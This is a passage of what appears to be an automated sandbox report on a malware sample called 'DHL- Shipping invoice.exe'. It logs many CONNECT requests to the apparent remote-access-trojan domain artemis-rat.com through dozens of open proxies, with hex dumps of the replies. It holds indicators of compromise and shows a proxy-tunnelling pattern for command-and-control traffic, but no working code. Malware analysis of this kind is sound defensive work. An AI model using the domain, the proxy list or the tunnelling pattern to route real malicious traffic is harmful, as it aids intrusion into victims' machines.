74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                            Mar 12, 2024 08:36:59.410352945 CET318INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            107192.168.2.45015882.153.138.18488886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.083833933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.304516077 CET165INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm="Access to Gluetun over HTTP"
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            108192.168.2.449991202.139.198.1530606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.084022999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:53.172367096 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            109192.168.2.449921117.160.250.13488996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.087465048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.568428040 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            110192.168.2.45018852.35.240.11910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.098325968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.603569031 CET65INHTTP/1.1 200 Connection Established
                            Content-Type: text/plain


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            111192.168.2.45002443.231.22.228806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.122632027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.495083094 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            112192.168.2.449967183.234.215.1184436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.131556034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.589278936 CET716INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.24.0
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 559
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            113192.168.2.450261185.162.228.48806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.140830994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.228167057 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            114192.168.2.450092216.10.242.18290576484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.147154093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.843489885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            115192.168.2.450279104.23.125.117806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.149940968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.237821102 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            116192.168.2.450328172.67.181.144806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.150023937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.237648964 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            117192.168.2.450336185.162.229.70806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.150654078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.237889051 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            118192.168.2.45015691.202.230.21980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.157444000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            119192.168.2.450232192.99.169.1984496484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.158237934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:39.112865925 CET22INHTTP/1.1 502 ERROR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            120192.168.2.45022266.45.246.19488886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.159863949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            121192.168.2.450357104.23.141.196806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.164241076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.251144886 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            122192.168.2.450115114.132.202.24680806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.164484024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.700860023 CET84INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Transfer-Encoding: chunked


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            123192.168.2.45033738.162.29.8531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.168613911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.516256094 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            124192.168.2.450109171.244.140.160270206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.172169924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.874730110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.859173059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.841042995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.860482931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950357914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.890582085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
